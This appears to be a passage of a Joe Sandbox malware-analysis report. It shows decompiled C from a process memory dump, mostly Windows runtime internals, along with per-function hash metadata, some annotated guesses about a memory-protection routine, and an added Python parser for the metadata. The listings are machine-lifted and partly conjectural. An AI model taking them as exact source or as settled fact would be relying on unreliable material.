                                              					if(( *0x19d8724 & 0x00000008) != 0) {
                                              						E019A52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
                                              					}
                                              					_t117 = _v44;
                                              					goto L26;
                                              				}
                                              				while(E019B15B5(0x19d8ae4, _t83, _t97, _t97) >= 0) {
                                              					_t97 = _v28;
                                              					_t83 = _t83 + 2;
                                              					if(_t83 < _v40) {
                                              						continue;
                                              					}
                                              					goto L10;
                                              				}
                                              				goto L24;
                                              			}
                                              Instruction addresses (the address column of the C-Code listing above, flattened by extraction): 0x019b0eb7 0x019b0eb9 0x019b0ec0 0x019b0ec2 0x019b0ecd 0x019b105b 0x019b105b 0x019b1061 0x019b1066 0x019b1066 0x019b106b 0x019b1073 0x019b1073 0x019b0ed3 0x019b0ed6 0x019b0edc 0x019b0ee0 0x019b0ee7 0x019b0ef0 0x019b0ef5 0x019b0efa 0x019b0efc 0x019b0efd 0x019b0f03 0x019b0f04 0x019b0f06 0x019b0f07 0x019b0f09 0x019b0f0e 0x019b0f14 0x019b0f23 0x019b0f2d 0x019b0f34 0x019b0f34 0x019b0f14 0x019b0f52 0x00000000 0x00000000 0x019b0f58 0x019b0f73 0x019b0f74 0x019b0f79 0x019b0f7d 0x019b0f80 0x019b0f86 0x019b0fab 0x019b0fb5 0x019b0fc6 0x019b0fd1 0x019b0fe3 0x019b0fd3 0x019b0fdc 0x019b0fdc 0x019b0feb 0x019b1009 0x019b1009 0x019b1015 0x019b1027 0x019b1017 0x019b1020 0x019b1020 0x019b102f 0x019b103c 0x019b103c 0x019b1048 0x019b1050 0x019b1050 0x019b1055 0x00000000 0x019b1055 0x019b0f88 0x019b0f9e 0x019b0fa2 0x019b0fa9 0x00000000 0x00000000 0x00000000 0x019b0fa9 0x00000000

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: `
                                              • API String ID: 0-2679148245
                                              • Opcode ID: 6da7d07ad361d6d31c6cade71ac3ae1b64f9b022f8602792f67d45aa9529f92c
                                              • Instruction ID: fa80337a087c5e843c9357e01674334bc26c5c82edf510a29dd8c07ade148f1e
                                              • Opcode Fuzzy Hash: 6da7d07ad361d6d31c6cade71ac3ae1b64f9b022f8602792f67d45aa9529f92c
                                              • Instruction Fuzzy Hash: B3518C713043429BD325DF68DAD4B5BBBE9ABC4714F08092CFA8A87291D670E805C762
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 75%
                                              			E0191F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
                                              				intOrPtr _v8;
                                              				intOrPtr _v12;
                                              				intOrPtr _v16;
                                              				char* _v20;
                                              				intOrPtr _v24;
                                              				char _v28;
                                              				intOrPtr _v32;
                                              				char _v36;
                                              				char _v44;
                                              				char _v52;
                                              				intOrPtr _v56;
                                              				char _v60;
                                              				intOrPtr _v72;
                                              				void* _t51;
                                              				void* _t58;
                                              				signed short _t82;
                                              				short _t84;
                                              				signed int _t91;
                                              				signed int _t100;
                                              				signed short* _t103;
                                              				void* _t108;
                                              				intOrPtr* _t109;
                                              
                                              				_t103 = __ecx;
                                              				_t82 = __edx;
                                              				_t51 = E01904120(0, __ecx, 0,  &_v52, 0, 0, 0);
                                              				if(_t51 >= 0) {
                                              					_push(0x21);
                                              					_push(3);
                                              					_v56 =  *0x7ffe02dc;
                                              					_v20 =  &_v52;
                                              					_push( &_v44);
                                              					_v28 = 0x18;
                                              					_push( &_v28);
                                              					_push(0x100020);
                                              					_v24 = 0;
                                              					_push( &_v60);
                                              					_v16 = 0x40;
                                              					_v12 = 0;
                                              					_v8 = 0;
                                              					_t58 = E01929830();
                                              					_t87 =  *[fs:0x30];
                                              					_t108 = _t58;
                                              					L019077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
                                              					if(_t108 < 0) {
                                              						L11:
                                              						_t51 = _t108;
                                              					} else {
                                              						_push(4);
                                              						_push(8);
                                              						_push( &_v36);
                                              						_push( &_v44);
                                              						_push(_v60);
                                              						_t108 = E01929990();
                                              						if(_t108 < 0) {
                                              							L10:
                                              							_push(_v60);
                                              							E019295D0();
                                              							goto L11;
                                              						} else {
                                              							_t109 = L01904620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
                                              							if(_t109 == 0) {
                                              								_t108 = 0xc0000017;
                                              								goto L10;
                                              							} else {
                                              								_t21 = _t109 + 0x18; // 0x18
                                              								 *((intOrPtr*)(_t109 + 4)) = _v60;
                                              								 *_t109 = 1;
                                              								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
                                              								 *(_t109 + 0xe) = _t82;
                                              								 *((intOrPtr*)(_t109 + 8)) = _v56;
                                              								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
                                              								E0192F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
                                              								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                              								 *((short*)(_t109 + 0xc)) =  *_t103;
                                              								_t91 =  *_t103 & 0x0000ffff;
                                              								_t100 = _t91 & 0xfffffffe;
                                              								_t84 = 0x5c;
                                              								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
                                              									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
                                              										_push(_v60);
                                              										E019295D0();
                                              										L019077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
                                              										_t51 = 0xc0000106;
                                              									} else {
                                              										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
                                              										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                              										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
                                              										goto L5;
                                              									}
                                              								} else {
                                              									L5:
                                              									 *_a4 = _t109;
                                              									_t51 = 0;
                                              								}
                                              							}
                                              						}
                                              					}
                                              				}
                                              				return _t51;
                                              			}
                                              Instruction addresses (the address column of the C-Code listing above, flattened by extraction): 0x0191f0d3 0x0191f0d9 0x0191f0e0 0x0191f0e7 0x0191f0f2 0x0191f0f4 0x0191f0f8 0x0191f100 0x0191f108 0x0191f10d 0x0191f115 0x0191f116 0x0191f11f 0x0191f123 0x0191f124 0x0191f12c 0x0191f130 0x0191f134 0x0191f13d 0x0191f144 0x0191f14b 0x0191f152 0x0195bab0 0x0195bab0 0x0191f158 0x0191f158 0x0191f15a 0x0191f160 0x0191f165 0x0191f166 0x0191f16f 0x0191f173 0x0195baa7 0x0195baa7 0x0195baab 0x00000000 0x0191f179 0x0191f18d 0x0191f191 0x0195baa2 0x00000000 0x0191f197 0x0191f19b 0x0191f1a2 0x0191f1a9 0x0191f1af 0x0191f1b2 0x0191f1b6 0x0191f1b9 0x0191f1c4 0x0191f1d8 0x0191f1df 0x0191f1e3 0x0191f1eb 0x0191f1ee 0x0191f1f4 0x0191f20f 0x0195bab7 0x0195babb 0x0195bacc 0x0195bad1 0x0191f215 0x0191f218 0x0191f226 0x0191f22b 0x00000000 0x0191f22b 0x0191f1f6 0x0191f1f6 0x0191f1f9 0x0191f1fb 0x0191f1fb 0x0191f1f4 0x0191f191 0x0191f173 0x0191f152 0x0191f203

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: @
                                              • API String ID: 0-2766056989
                                              • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                              • Instruction ID: e4d83568624067491504c3fd0c02582e41516742bf290eb801bf308c6f5a108d
                                              • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                              • Instruction Fuzzy Hash: 20519C716007159FD321DF28C840A6BBBF9FF88710F00892DFA9997690E7B4E944CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 75%
                                              			E01963540(intOrPtr _a4) {
                                              				signed int _v12;
                                              				intOrPtr _v88;
                                              				intOrPtr _v92;
                                              				char _v96;
                                              				char _v352;
                                              				char _v1072;
                                              				intOrPtr _v1140;
                                              				intOrPtr _v1148;
                                              				char _v1152;
                                              				char _v1156;
                                              				char _v1160;
                                              				char _v1164;
                                              				char _v1168;
                                              				char* _v1172;
                                              				short _v1174;
                                              				char _v1176;
                                              				char _v1180;
                                              				char _v1192;
                                              				void* __ebx;
                                              				void* __edi;
                                              				void* __esi;
                                              				void* __ebp;
                                              				short _t41;
                                              				short _t42;
                                              				intOrPtr _t80;
                                              				intOrPtr _t81;
                                              				signed int _t82;
                                              				void* _t83;
                                              
                                              				_v12 =  *0x19dd360 ^ _t82;
                                              				_t41 = 0x14;
                                              				_v1176 = _t41;
                                              				_t42 = 0x16;
                                              				_v1174 = _t42;
                                              				_v1164 = 0x100;
                                              				_v1172 = L"BinaryHash";
                                              				_t81 = E01920BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
                                              				if(_t81 < 0) {
                                              					L11:
                                              					_t75 = _t81;
                                              					E01963706(0, _t81, _t79, _t80);
                                              					L12:
                                              					if(_a4 != 0xc000047f) {
                                              						E0192FA60( &_v1152, 0, 0x50);
                                              						_v1152 = 0x60c201e;
                                              						_v1148 = 1;
                                              						_v1140 = E01963540;
                                              						E0192FA60( &_v1072, 0, 0x2cc);
                                              						_push( &_v1072);
                                              						E0193DDD0( &_v1072, _t75, _t79, _t80, _t81);
                                              						E01970C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
                                              						_push(_v1152);
                                              						_push(0xffffffff);
                                              						E019297C0();
                                              					}
                                              					return E0192B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
                                              				}
                                              				_t79 =  &_v352;
                                              				_t81 = E01963971(0, _a4,  &_v352,  &_v1156);
                                              				if(_t81 < 0) {
                                              					goto L11;
                                              				}
                                              				_t75 = _v1156;
                                              				_t79 =  &_v1160;
                                              				_t81 = E01963884(_v1156,  &_v1160,  &_v1168);
                                              				if(_t81 >= 0) {
                                              					_t80 = _v1160;
                                              					E0192FA60( &_v96, 0, 0x50);
                                              					_t83 = _t83 + 0xc;
                                              					_push( &_v1180);
                                              					_push(0x50);
                                              					_push( &_v96);
                                              					_push(2);
                                              					_push( &_v1176);
                                              					_push(_v1156);
                                              					_t81 = E01929650();
                                              					if(_t81 >= 0) {
                                              						if(_v92 != 3 || _v88 == 0) {
                                              							_t81 = 0xc000090b;
                                              						}
                                              						if(_t81 >= 0) {
                                              							_t75 = _a4;
                                              							_t79 =  &_v352;
                                              							E01963787(_a4,  &_v352, _t80);
                                              						}
                                              					}
                                              					L019077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
                                              				}
                                              				_push(_v1156);
                                              				E019295D0();
                                              				if(_t81 >= 0) {
                                              					goto L12;
                                              				} else {
                                              					goto L11;
                                              				}
                                              			}
                                              Instruction addresses (the address column of the C-Code listing above, flattened by extraction): 0x01963552 0x0196355a 0x0196355d 0x01963566 0x01963567 0x0196357e 0x0196358f 0x019635a1 0x019635a5 0x0196366b 0x0196366b 0x0196366d 0x01963672 0x01963679 0x01963685 0x0196368d 0x0196369d 0x019636a7 0x019636b8 0x019636c6 0x019636c7 0x019636dc 0x019636e1 0x019636e7 0x019636e9 0x019636e9 0x01963703 0x01963703 0x019635b5 0x019635c0 0x019635c4 0x00000000 0x00000000 0x019635ca 0x019635d7 0x019635e2 0x019635e6 0x019635e8 0x019635f5 0x019635fa 0x01963603 0x01963604 0x01963609 0x0196360a 0x01963612 0x01963613 0x0196361e 0x01963622 0x01963628 0x0196362f 0x0196362f 0x01963636 0x01963638 0x0196363b 0x01963642 0x01963642 0x01963636 0x01963657 0x01963657 0x0196365c 0x01963662 0x01963669 0x00000000 0x00000000 0x00000000 0x00000000

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: BinaryHash
                                              • API String ID: 0-2202222882
                                              • Opcode ID: a5e24a02cfdc2ad75aa93241c0d4c3fd4453dadcf59c2d433cf5f689a836f717
                                              • Instruction ID: 2140cb99df37ed6c424c6d7e73e9eae94fc6cd8193f97abf16785a987324d7c4
                                              • Opcode Fuzzy Hash: a5e24a02cfdc2ad75aa93241c0d4c3fd4453dadcf59c2d433cf5f689a836f717
                                              • Instruction Fuzzy Hash: F44101B1D0152DAADB21DA50CC85FAEB77CAB54714F0045A5EA0DAB241DB309F888FA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 71%
                                              			E019B05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                                              				signed int _v20;
                                              				char _v24;
                                              				signed int _v28;
                                              				char _v32;
                                              				signed int _v36;
                                              				intOrPtr _v40;
                                              				void* __ebx;
                                              				void* _t35;
                                              				signed int _t42;
                                              				char* _t48;
                                              				signed int _t59;
                                              				signed char _t61;
                                              				signed int* _t79;
                                              				void* _t88;
                                              
0x019b05c5            _v28 = __edx;
0x019b05ca            _t79 = __ecx;
0x019b05d3            if(E019B07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
0x019b06db                L13:
0x019b06db                _t35 = 0;
0x019b06dd                L14:
0x019b06e3                return _t35;
0x019b06e3            }
0x019b05dd            _t61 = __ecx[1];
0x019b05e7            _t59 = __ecx[0xf];
0x019b05f6            _v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
0x019b0600            _v36 = _a8 << 0xc;
0x019b0607            _t42 =  *(_t59 + 0xc) & 0x40000000;
0x019b0610            asm("sbb esi, esi");
                      // page protection for the allocation below: 0x40 (PAGE_EXECUTE_READWRITE) when the
                      // 0x40000000 flag at _t59+0xc is set, otherwise 4 (PAGE_READWRITE)
0x019b0615            _t88 = ( ~_t42 & 0x0000003c) + 4;
0x019b061a            if(_t42 != 0) {
                          // six arguments pushed right-to-left: (-1, _t59, 3, &_v24, 0x14, 0). The shape is
                          // consistent with NtQueryVirtualMemory(NtCurrentProcess(), _t59, MemoryRegionInformation,
                          // &_v24, sizeof(MEMORY_REGION_INFORMATION) == 0x14, NULL); the report does not name the
                          // callee, so this reading is an assumption.
0x019b061c                _push(0);
0x019b061e                _push(0x14);
0x019b0624                _push( &_v24);
0x019b0625                _push(3);
0x019b0627                _push(_t59);
0x019b0628                _push(0xffffffff);
                          // under that reading _v24 is AllocationBase and _v20 AllocationProtect;
                          // 0x60 == PAGE_EXECUTE_READ | PAGE_EXECUTE_READWRITE, so the executable
                          // protection is kept only when the existing region is already executable
0x019b0631                if(E01929730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
0x019b0640                    _push(_t61);
0x019b064d                    E019AA80D(_t59, 1, _v20, 0);
0x019b0654                    _t88 = 4;
0x019b0654                }
0x019b0631            }
                      // 0x1000 == MEM_COMMIT; _t88 is the protection chosen above
0x019b066d            _t35 = E019AA854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
0x019b0674            if(_t35 < 0) {
0x00000000                goto L14;
0x00000000            }
0x019b0692            E019B1293(_t79, _v40, E019B07DF(_t79, _v28,  &_a4,  &_a8, 1));
                      // 0x7ffe0380 lies inside KUSER_SHARED_DATA (mapped at 0x7ffe0000 in every user-mode
                      // process); [fs:0x30] is the PEB on x86
0x019b069e            if(E01907D50() == 0) {
0x019b06b0                _t48 = 0x7ffe0380;
0x019b06a0            } else {
0x019b06a9                _t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
0x019b06a9            }
                      // the shared flag byte and bit 0 of the PEB dword at +0x240 must both be set
                      // before E019A138A is called with the committed range (_v32, _v36)
0x019b06b8            if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
0x019b06d6                E019A138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
0x019b06d6            }
0x00000000            goto L13;
                  }

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: `
                                              • API String ID: 0-2679148245
                                              • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                              • Instruction ID: 094d8d3476a725ad63bc0195ab5fff9048f6d8c4a9ccc16a161d863f6797952c
                                              • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                              • Instruction Fuzzy Hash: 4631B372604346ABE710DE29CE85F9B7BE9BBC4754F184229FA589B280D670E904C791
                                              Uniqueness

                                              Uniqueness Score: -1.00%
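The per-function blocks in this part of the report (Memory Dump Source, String ID, Opcode ID, Instruction ID, the two fuzzy hashes and the Uniqueness Score) repeat for every function Joe Sandbox lifted from the dump at 018C0000, and the strings they reference (BinaryName, WindowsExcludedProcs, "Critical error detected %lx", the NTDLL CritSect message) are what an analyst usually wants to search by. As an added example, not code from the report or from Joe Sandbox, the Python below parses blocks in exactly this layout into records, indexes them by referenced string, and groups them by Instruction Fuzzy Hash. The field labels are the report's own; the sample input is constructed by copying two blocks from this page.

```python
"""Parse Joe Sandbox per-function metadata blocks into records.

Added example, not part of the report. Field labels are the report's own;
SAMPLE is constructed by copying two blocks from the page.
"""
import re
from collections import defaultdict

# Constructed sample input: two blocks copied verbatim from the report.
SAMPLE = """\
Strings
Memory Dump Source
• Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
Similarity
• API ID:
• String ID: BinaryName
• API String ID: 0-215506332
• Opcode ID: f35ca9f0ab4bc8663979f67feab0bcb4a022c05831446d36bd7a0daad3c73714
• Instruction ID: 83aa04ffa85278e0f018d65a287b2de354fbdb4c3fdc8e847f494199be0cd367
• Opcode Fuzzy Hash: f35ca9f0ab4bc8663979f67feab0bcb4a022c05831446d36bd7a0daad3c73714
• Instruction Fuzzy Hash: FF31E832D0051AEFEB15DA58C945E6BB77CFB90720F014169E91CA7251D7309F00CBB0
Uniqueness

Uniqueness Score: -1.00%

Strings
• Critical error detected %lx, xrefs: 01998E21
Memory Dump Source
• Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
Similarity
• API ID:
• String ID: Critical error detected %lx
• API String ID: 0-802127002
• Opcode ID: e5ebb508c562db353db2dff7c4232d468b40fd7c3ba349558769967a220b25ab
• Instruction ID: c109bc565b31a2e0a5fc38d7ff105eb07b78c1529422183ad13a095ec1042895
• Opcode Fuzzy Hash: e5ebb508c562db353db2dff7c4232d468b40fd7c3ba349558769967a220b25ab
• Instruction Fuzzy Hash: 1E1175B5D00348DADF28EFE88515B9CBBF4BB49311F24421EE16DAB282C3341602CF14
Uniqueness

Uniqueness Score: -1.00%
"""

XREF_RE = re.compile(r"^•\s*(.+), xrefs: ([0-9A-Fa-f]+(?:, [0-9A-Fa-f]+)*)$")
FIELD_RE = re.compile(r"^•\s*([^:]+):\s*(.*)$")
SCORE_RE = re.compile(r"^Uniqueness Score:\s*(-?\d+(?:\.\d+)?)%$")


def parse_blocks(text):
    """Split report text into one dict per function block.

    A block is closed by its "Uniqueness Score" line. Bullet fields are keyed
    by the report's labels, "Source File" is split into its three parts, and
    strings listed with xrefs are collected under "xrefs" as (string, [addr]).
    """
    blocks, cur = [], {"xrefs": []}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = SCORE_RE.match(line)
        if m:
            cur["Uniqueness Score"] = float(m.group(1))
            blocks.append(cur)
            cur = {"xrefs": []}
            continue
        m = XREF_RE.match(line)   # before FIELD_RE: an xref line also contains a colon
        if m:
            cur["xrefs"].append((m.group(1), m.group(2).split(", ")))
            continue
        m = FIELD_RE.match(line)
        if not m:
            continue              # headers such as "Similarity" carry no data
        key, val = m.group(1).strip(), m.group(2).strip()
        if key == "Source File":
            dump, *rest = [p.strip() for p in val.split(",")]
            cur["Source File"] = dump
            for part in rest:     # "Offset: 018C0000", "based on PE: true"
                k, _, v = part.partition(":")
                cur[k.strip()] = v.strip()
        else:
            cur[key] = val
    return blocks


def index_by_string(blocks):
    """Map each referenced string to the Instruction IDs of functions using it."""
    idx = defaultdict(list)
    for b in blocks:
        if b.get("String ID"):
            idx[b["String ID"]].append(b.get("Instruction ID"))
    return dict(idx)


def group_by_fuzzy_hash(blocks):
    """Group Instruction IDs by Instruction Fuzzy Hash; a shared hash across
    dumps or samples is the quickest sign of the same function seen twice."""
    groups = defaultdict(list)
    for b in blocks:
        if b.get("Instruction Fuzzy Hash"):
            groups[b["Instruction Fuzzy Hash"]].append(b.get("Instruction ID"))
    return dict(groups)


if __name__ == "__main__":
    for s, ids in index_by_string(parse_blocks(SAMPLE)).items():
        print(f"{s!r}: {ids}")
```

Feed it the text of a whole report section and the string index immediately answers which lifted functions touch a given string; comparing `group_by_fuzzy_hash` output across two reports is a cheap way to see which functions recur between samples.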

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: BinaryName
                                              • API String ID: 0-215506332
                                              • Opcode ID: f35ca9f0ab4bc8663979f67feab0bcb4a022c05831446d36bd7a0daad3c73714
                                              • Instruction ID: 83aa04ffa85278e0f018d65a287b2de354fbdb4c3fdc8e847f494199be0cd367
                                              • Opcode Fuzzy Hash: f35ca9f0ab4bc8663979f67feab0bcb4a022c05831446d36bd7a0daad3c73714
                                              • Instruction Fuzzy Hash: FF31E832D0051AEFEB15DA58C945E6BB77CFB90720F014169E91CA7251D7309F00CBB0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: @
                                              • API String ID: 0-2766056989
                                              • Opcode ID: fd48f685ac812849b26093eda96435e9d76d35bb90f83376596eebdad985f524
                                              • Instruction ID: d2d786094d4c484b01b2178325c847f57bed59140abcf6165e7f48012a4fd381
                                              • Opcode Fuzzy Hash: fd48f685ac812849b26093eda96435e9d76d35bb90f83376596eebdad985f524
                                              • Instruction Fuzzy Hash: CE31C2B15083099FC721DF68C984D6BBBE8FBD5698F000A2EF99883250D734DD45CB92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: WindowsExcludedProcs
                                              • API String ID: 0-3583428290
                                              • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                              • Instruction ID: b5eee3fc5890f8e2bbf4a094323009912bb766d4300afaae094d521f37157930
                                              • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                              • Instruction Fuzzy Hash: 2C21C87B50112DEBDB229A998844F5B7BADEF81B51F054429FB48DB200D631DE0097A0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: Actx
                                              • API String ID: 0-89312691
                                              • Opcode ID: c0f6834b7b62052f3586ace096423ec05eab489e0d2e68db0469a19034f8d6e2
                                              • Instruction ID: 80ceba47da2984130a71ca1b447458e2322a43ead9bccee6eed6c874dd8a2cef
                                              • Opcode Fuzzy Hash: c0f6834b7b62052f3586ace096423ec05eab489e0d2e68db0469a19034f8d6e2
                                              • Instruction Fuzzy Hash: 10119335304A028FEB378E1D8490B3676DAEB95B25F24492AE56DCB3D1D7B0CA418343
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              • Critical error detected %lx, xrefs: 01998E21
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: Critical error detected %lx
                                              • API String ID: 0-802127002
                                              • Opcode ID: e5ebb508c562db353db2dff7c4232d468b40fd7c3ba349558769967a220b25ab
                                              • Instruction ID: c109bc565b31a2e0a5fc38d7ff105eb07b78c1529422183ad13a095ec1042895
                                              • Opcode Fuzzy Hash: e5ebb508c562db353db2dff7c4232d468b40fd7c3ba349558769967a220b25ab
                                              • Instruction Fuzzy Hash: 1E1175B5D00348DADF28EFE88515B9CBBF4BB49311F24421EE16DAB282C3341602CF14
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0197FF60
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                              • API String ID: 0-1911121157
                                              • Opcode ID: 02b6bc6be80b8034dc3c062189541b39e04554b504231708388489ec65ff338a
                                              • Instruction ID: 8d8d4459a1445bd4a213732f753c3f4b7417e3683d9b2b6e64cd4468ca91a0ac
                                              • Opcode Fuzzy Hash: 02b6bc6be80b8034dc3c062189541b39e04554b504231708388489ec65ff338a
                                              • Instruction Fuzzy Hash: F6110471910644EFEB26DBA4C948F98BBB2FF84715F558044E10C672A1CB389990CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6157bbb2641a7b9f71845dcb4acec0392f6258c22c1b9be25ef99ad1fc9c32e6
                                              • Instruction ID: 8b5b72675191959cbb9b851db269efd4ab3bddc87fba49f4b5165de3966a3fe7
                                              • Opcode Fuzzy Hash: 6157bbb2641a7b9f71845dcb4acec0392f6258c22c1b9be25ef99ad1fc9c32e6
                                              • Instruction Fuzzy Hash: 9D425A71901229CFEB24CF68C980BE9BBB5FF49305F1581AAD94DEB242D734A985CF50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a66866b5b140bf96f2df5d1524c8eb9526308843acd302ab972f2cab311eb914
                                              • Instruction ID: 142bd26c65995f6d210f7411878f620c73d8a6bcec943216e9049be427a4579e
                                              • Opcode Fuzzy Hash: a66866b5b140bf96f2df5d1524c8eb9526308843acd302ab972f2cab311eb914
                                              • Instruction Fuzzy Hash: 76F18D706083118FC726CF19C480A7AB7E5FF98715F05492EFA8ACB291E738D995CB52
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f8ec6bb20630f7ecd5452595effe42f2650069e0e6a624b6ada9412f1bd41e15
                                              • Instruction ID: 6ab9fe46afa73f050fc5a59d59964a3a4a703460b1cad82f88c312ff510dccca
                                              • Opcode Fuzzy Hash: f8ec6bb20630f7ecd5452595effe42f2650069e0e6a624b6ada9412f1bd41e15
                                              • Instruction Fuzzy Hash: F2F13A316083459FE726DF2CC440B6A7BE9BFC5324F25891DE99D9B246D734D881CB82
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6b5ef162c17b0be85c16960c32dbcd9aadc952fe84b158d4cdd47cf3ab677044
                                              • Instruction ID: b330c733ca37444b431ef9dfffd69593678e4a03036708ff212d61cd18c2d7e9
                                              • Opcode Fuzzy Hash: 6b5ef162c17b0be85c16960c32dbcd9aadc952fe84b158d4cdd47cf3ab677044
                                              • Instruction Fuzzy Hash: 82E1D331A0535ACFEB35CF59C880B69B7B6BF85318F04429DDB0E9B291D7349A81CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6cda8693f2a08a92507e0f3f663c4a2a3fc8dca43fea79bb468ac43f9c921890
                                              • Instruction ID: 00926f442435e2c84bf1a44c8e5fdefe69b4be19186429d667d72cae28ee3792
